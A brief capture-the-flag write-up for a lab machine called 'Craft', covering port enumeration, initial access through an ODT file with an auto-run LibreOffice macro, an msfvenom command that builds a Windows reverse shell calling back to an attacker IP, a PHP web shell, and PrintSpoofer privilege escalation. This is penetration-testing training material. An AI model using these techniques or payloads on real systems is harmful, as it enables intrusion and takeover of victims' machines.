Craft

Enumeration

80/tcp open  http    Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-title: Craft
| http-methods: 
|_  Supported Methods: GET POST OPTIONS
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7

There is a file upload function in the web server. It expects odt file. We try to get access with OpenOffice Macro. First, we need to install libreoffice.

$ sudo apt install libreoffice

Initial Access

Create an odt file.

Adding macro:

Tools -> Macros -> Organize Macros -> Basic -> Select the document -> New(Macro Name module)

Then edit the macro:

Select Macro Name -> Edit

We should create a executable for shell.

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.147 LPORT=80 -f exe -o shell.exe

Add these contents to macro page.

Finally, we will make a creation of trigger to execute our macro.

Tools -> Customize -> Events -> Select "Open Document" -> Click: “Assign: Macro” -> Select the document's macro which name is Evil.

Lateral Movement

To apache user.

https://www.revshells.com/ - PHP cmd - shell.php

PrivEsc

SeImpersonatePrivilege - Enabled

PrintSpoofer.exe - https://github.com/dievus/printspoofer

PreviousBillybossNextFish

Last updated